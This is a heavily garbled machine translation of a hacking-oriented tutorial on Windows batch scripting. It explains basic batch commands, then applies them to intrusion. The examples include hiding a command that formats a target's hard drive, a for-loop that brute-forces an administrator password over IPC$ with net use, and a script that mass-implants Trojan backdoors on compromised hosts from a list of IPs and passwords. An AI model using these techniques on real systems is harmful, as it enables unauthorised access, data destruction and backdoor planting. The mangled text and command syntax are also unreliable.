Recently, for the discussion of batch technology, there are many good batch procedures release, but if there is no certain related knowledge, I am afraid it is not easy to understand and understand these batch files, but also can't talk about my hands-on, The ancient language: "It is better to teach people to fish," Give all friends who have worked hard to achieve the free and sharing of the network. Batch file is a formatted text file, which contains one or more commands. Its file extension is .bat or .cmd. At the command prompt, the name of the approval file is submitted, or double-click the batch file, the system will call CMD.exe to run them one by one according to the order of each command in this file. Use batch files (also known as batch programs or scripts) to simplify daily or repetitive tasks. Of course, the main content of our version is to introduce some actual use in the invasion, such as the use of batch files to be mentioned later to make patch, bulk implant the latter procedures. Let's start our batch of learning trips. 1. Simple Batch Interior Command Introduction 1.echo command opens back or shut down request return function, or displays a message. If there is no parameters, the echo command will display the current echo setting. Syntax Echo [{ON | OFF}] [Message] Sample: @echo off / echo hello world In practical applications, we will combine this command and redirect symbol (also known as pipe symbol, generally> >> ^) To enable input some commands to a specific format. This will be reflected in the later examples. 2. The @ command indicates that the @ later command is not displayed during the intrusion process (for example, using batch to format the enemy's hard drive) naturally not let the other party see the command you use. Sample: @echo off @ echo now initializing the program ... @ format x: / q / u / autoset (format This command is not available / y, the grateful is Microsoft left This parameter is the same as us, the effects, and / y is the same.) 3.GOTO command specifies that the jump to the label. After finding the label, the program will process the command starting from the next row. Syntax: goto label (Label is the parameter, specifies the row in the batch program to be turned.) Sample: if {% 1} == {} goto noparmsif {% 2} == {} GOTO NOPARMS (if IF here, % 1,% 2, you don't understand, first jump, there will be detailed explanation. It is meaningful letters, letters before letting: It is used to indicate that this letter is a label, and the goto command is based on this: to find the next step to jump there. It is best to have some explanation that you will understand your intentions. 4.Rem Command Comment command, quite with / * in the C language -------- * /, which does not be executed, just a comment, easy to read and modify it later.
Rem messagesample: @Rem Here is the description.5.pause command When you run the PAUSE command, the following message will be displayed: press any key to payue.. Sample: @echo off: begin copy a: *. * D: / backcho Please put a new disk Into Driver a Pause Goto Begin In this example, all files on the disk in Drive A are copied to D: / back. Display Note Tips When another disk is placed in the drive A, the PAUSE command will hang the program so that you can replace the disk and press any key to continue processing. 6.Call Command From a batch program to another batch program and does not terminate the parent batch program. The call command accepts the label used as calling the target. If you use Call outside the script or batch file, it will not work on the command line. Syntax Call [[DRIVE:] [PATH] FILENAME [BATCHPARETERS]] [: label [arguments]] parameter [drive:} [path] filename Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension. The 7.start command calls an external program, all DOS commands and command line programs can be called by the start command. Intrusion Common Parameters: MIN Starting Window Minimizes Separate Separated Space In Separated Space Time 16 WINDOWS Program High In the High Priority Category Start Application RealTime Start the application WAIT launch application and wait for it to end Parameters These The application that is transmitted to the parameter executed by the command / program is a 32-bit GUI application, and the cmd.exe does not equal the application to the command prompt. If executed within the command script, the new behavior will not happen. 8.choice Command Choice Use this command to allow users to enter a character to run different commands. When using, you should add / c: parameters, C: After you should write the prompt that the characters can be entered, there is no space. Its return code is 1234 ..., such as: Choice / C: DME DEFRAG, MEM, END will display DEFRAG, MEM, END [D, M, E]? Sample: sample.bat is as follows: @echo off choice / C : DME DEFRAG, MEM, END IF ERRORLVEL 3 GOTO Defrag (first judge) Errorlevel 2 Goto Mem if Errotlevel 1 goto end: defrag c: / dos / defrag goto end: MEM MEM GOTO end: End Echo After this file runs, the DEFRAG, MEM, END [D, M, E]? The user can select DME, then the IF statement will make a judgment, and D represents the block segment that executes the label as DEFRAG, m means execution label is MEM The block, e represents a block that executes the label as an end, and each block is finally jumped to the END Number with goto End, and then the program will display good bye, the file ends. 9. IF Command If Indicates whether to meet the specified conditions, thereby deciding to perform different commands. There are three formats: 1, if "==" String "The command parameter to be executed is equal to the specified string, the condition is established, run the command, otherwise run the next sentence.
(Note is two equal numbers), such as if "% 1" == "a" format A: if {% 1} == {} goto noparmsif {% 2} == {} goto noparms2, if the application If there is a specified file, the condition is established, run the command, otherwise run the next sentence. If if exist config.sys edit config.sys 3, if ErrorleVel / if not errorlevel digitally peers to be executed If the return code is equal to the specified number, the condition is established, run the command, otherwise run the next sentence. If the IF ErrorLevel 2 Goto X2 DOS program is running, a number will be returned to DOS, called an error code errorlevel or a return code. The common return code is 0, 1.10.for command for command is a more complex command, mainly The parameter is used to perform commands within the specified range. When using the for command in the batch file, specify the variable, please use %% VariableFor {% Variable | %% Variable} in (SET) Do Command [CommandLineOptions]% Variable Specifies a single letter replaceable parameter. (SET) Specify one or a set of files. You can use wildcards. Command specifies the command to execute each file. Command-parameters specifies parameters or command line switches for a specific command. When using the for command in a batch file, specify the variable, please use %% Variable without using% Variable. The variable name is case sensitive, so% i is different from% i if the command extension is enabled, the following additional for command format will be supported: for / d% variable in (set) do command [command-parameters] If concentrated Contains a wildcard, specify matching with the directory name without matching the file name. FOR / R [[DRIVE:] PATH]% Variable In (SET) Do Command [Command-Check Take the directory tree in [Drive:] Path, pointing to the for statement in each directory. If there is no specified directory after / r, use the current directory. If the set is only one single point (.) Character, the directory tree is enumerated. FOR / L% Variable in (Start, Step, End) Do Command [Command-Para This set represents a digital sequence from the beginning to the end in incremental form. Therefore, (1, 1, 5) will produce sequences 1 2 3 4 5, (5, -1, 1) will produce a sequence (5 4 3 2 1). FOR / F ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") Do Command for / f ["Options"]% Variable in (Command) Do Command or if there is a usebackq option: for / f ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") do command for / f [" Options "]% Variable In (Command) do command filenameset is one or more file names. Before proceeding to the next file in the filenameset, each file has been opened, read and processed.
Processing includes reading a file, dividing it into a line of rows, and analyzing each line into zero or more symbols. The FOR cycle is then called with the string variable value of the string. With the default, / f is separated from the first blank symbol of each line of each file. Skip blank lines. You can replace the default parsing operation by specifying an optional "Options" parameter. This band-quoted string includes one or more keywords that specify different parses options. These keywords are: eol = c - refers to the end of a row bet release character (one) Skip = n - refers to the number of rows ignored at the beginning of the file. Delims = xxx - Indicator jacket set. This default separator set replaces the space and the jumping. Tokens = x, y, m-n - means which symbols per row are passed to each iteration for itself. This will result in a range of additional variable names. Specify the last character as an asterisk in the M symbol string via the NTH symbol, then the additional variable will assign and accept the reserved text of the row in the last symbol. Usebackq - Specify new syntax is already in the case of using: Perform a string of a back quotation as a command and the quotation marks characters are text string commands and allow the use of double quotes to expand the file name in Fi. Sample1: for / f "eol =; tokens = 2, 3 * delims =,"% i in (myfile.txt) do command will analyze every line in MyFile.txt, ignore those lines that are headers with a semicolon, will The second and third symbols in the row are passed to the forpriology; with a tend to be used with / or a space symbol. Note that the statement of this FOR program references% i to acquire the second symbol, reference% J to obtain the third symbol, refer to% K to get all the remaining symbols after the third symbol. For file names with spaces, you need to create files with double quotes. In this way, double quotes are used, you also need to use the UseBackQ option, otherwise the dual quotation marks will be understood to be used as a string to define a certain analysis. % i is specifically description in the For statement,% J and% K are specifically demonstrated by the tokens = option. You can specify up to 26 symbols via tokens =, as long as you do not attempt to illustrate a variable above the letter Z or Z. Keep in mind that for variables are single letters, case sensitive and global; at the same time, there is not more than 52 or more. You can also use FOR / F analysis logic on adjacent strings; method is to enclose the filenameset between brackets with single quotes. Thus, the character is called a single input line in a file. Finally, you can use the for / f command to analyze the output of the command. The method is to turn the filenameset between brackets into a hind string. This string will be regarded as a command line, pass to a sub-cmd.exe, and its output will be grasped into memory and is used as a file analysis. Therefore, the following example: for / f "UseBackQ Delims =="% I in (`set`) Do @echo% i enumerate the name of the environment variable in the current environment. In addition, the replacement of the FOR variable reference has been enhanced. You can now use the following options: ~ i - Delete any quotation marks ("), expand% i% ~ FI - expand% i to a fully qualified path name% ~ Di - expand% i to a drive number% ~ pi - only expand% i to a path% ~ Ni - expand% i to a file name% ~ xi - expand% i to a file extension name% ~ Si - the extended path only contains short name% ~ AI - expand% i to file file attribute% ~ Ti - expand% i to file Date / time% ~ zi - expand% i to file size% ~ Path: i - Find column in the path environment The directory of the variable and expand% i to the first fully qualified name of the found.
If the environment variable is not defined, or if the file is not found, this combination key will expand empty strings to combine modifiers to get multiple results:% ~ DPI - only% i to a drive letter and path% ~ nxi - only % I expands to a file name and extension% ~ FSI - expand the% i to a full path name with a short name% ~ DP $ PATH: i - Find the directory column in the path environment variable, and expand% i To the first drive letter and path found. % ~ FTZAI - Extension% i to the DIR of the similar output line in the above example,% I and PATH can be replaced with other effective values. % ~ Syntax terminates with an effective FOR variable name. Select the larger write variable name similar to% I is more readily read, and avoid confusion with the combination of regardless of case. The above is the official help of MS, let's take a few examples to specify the use of the for command in the invasion. Sample2: Use the for command to achieve the violent password cracking to a target Win2k host. We use NET USE // IP / IPC $ "Password" / u: "administrator" to attempt to connect with the target host, and write a password when successful. The most important command is a: for / fi% in (Dict.txt) Do Net USE // IP / IPC $ "I%" / u: "administrator" uses I% to represent the password of Admin, in Dict.txt This is connected to the value of the I% with the NET USE command. Then passenger operation results to find command --for / fi %% in (dict.txt) do net use // ip / ipc $ "i %% / u:" administrator "|": command successfully completed " >> D: /ok.txt, so Ko. Sample3: Have you ever had a large number of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it. The main order is only one: (when using the for command in the batch file, specify the variable using %% variable) @for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do Start Call door.bat %% I %% J %% KToKens Usage See Sample1 above, here it represents the parameter% I% J% K in door.txt in order. CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file. Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName.
